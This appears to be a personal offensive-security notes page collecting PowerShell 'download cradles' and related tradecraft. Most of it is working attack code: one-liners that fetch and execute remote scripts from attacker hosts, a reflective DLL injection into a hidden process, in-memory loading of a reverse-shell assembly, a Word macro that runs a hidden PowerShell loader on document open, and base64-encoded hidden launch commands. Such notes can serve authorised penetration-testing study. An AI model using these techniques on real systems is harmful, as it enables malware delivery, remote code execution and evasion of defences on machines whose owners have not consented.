PS Download Cradles

Wednesday, April 20, 2022

8:13 PM

 Backlink: reference-notes-readme

Download Cradles

Reflective DLL Injection

$bytes = (New-Object System.Net.WebClient).DownloadData('http://192.168.49.205/met.dll')
Stop-Process -Name "notepad"
Stop-Process -Name "rundll32"
Start-Process -FilePath "C:\Windows\SysWOW64\notepad.exe" -WindowStyle Hidden
$processId = (Get-Process -Name "notepad").Id
IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.49.205/InvokeReflectivePEInjection.ps1')
Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $processId

normal download cradle

IEX (New-Object Net.Webclient).downloadstring("http://192.168.49.105/run.txt")

PowerShell 3.0+

IEX (iwr 'http://EVIL/evil.ps1')

hidden IE com object

$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

Msxml2.XMLHTTP COM object

$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

WinHttp COM object (not proxy aware!)

$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

using bitstransfer- touches disk!

Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r

DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)

code to execute needs to be a base64 encoded string stored in a TXT record

IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))

from @subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d

<#
<?xml version="1.0"?>
<command>
   <a>
      <execute>Get-Process</execute>
   </a>
  </command>
#>
$a = New-Object System.Xml.XmlDocument
$a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")
$a.command.a.execute | iex

Tradecraft

Setting Proxy

$wc = new-object system.net.WebClient
$wc.proxy = 192.168.72.12:3128
$wc.DownloadString("http://192.168.119.120/run.ps1")

User-Agent

$wc = new-object system.net.WebClient
$wc.Headers.Add('User-Agent', "This is my agent, there is no one like it...")
$wc.DownloadString("http://192.168.119.120/run.ps1")

In-memory PS Reflective Load

After building a C# project with a reverse shell, run the following in PS to load the precompiled C# assembly into memory and execute a shellcode runner.

$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.0.107/ClassLibrary.dll')

$assem = [System.Reflection.Assembly]::Load($data)
$class = $assem.GetType("ClassLibrary.Class1")
$method = $class.GetMethod("runner")
$method.Invoke(0, $null)

powershell $data = (New-Object System.Net.WebClient).DownloadData('http://192.168.0.107/ClassLibrary.dll');$assem = [System.Reflection.Assembly]::Load($data);$class = $assem.GetType('ClassLibrary1.Class1');$method = $class.GetMethod('runner');$method.Invoke(0, $null)

I can load it through an MS Office macro with the following code.

Sub MyMacro()
Dim str As String
str = "powershell $data = (New-Object System.Net.WebClient).DownloadData('http://192.168.0.107/ClassLibrary1.dll');$assem = [System.Reflection.Assembly]::Load($data);$class = $assem.GetType('ClassLibrary1.Class1');$method = $class.GetMethod('runner');$method.Invoke(0, $null)"
Shell str, vbHide
End Sub
Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Proxy-Aware Download Cradle

New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
$keys = Get-ChildItem 'HKU:\'
ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start = $key.Name.substring(10);break}}
$proxyAddr=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer
[system.net.webrequest]::DefaultWebProxy = new-object System.Net.WebProxy("http://$proxyAddr")
$wc = new-object system.net.WebClient
$wc.DownloadString("http://192.168.119.120/run2.ps1")

The code above gathers the proxy server IP address and port from registry and downloads file through it.

Check for 32/64 -bit

if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};

Full Command

if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQAOQAuADIAMAA1AC8AcgB1AG4ALgB0AHgAdAAiACkA';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);

Same - edited ps payload.

if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQAOQAuADEAMAA1AC8AcgB1AG4ALgB0AHgAdAAnACkAIAB8ACAASQBFAFgA';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);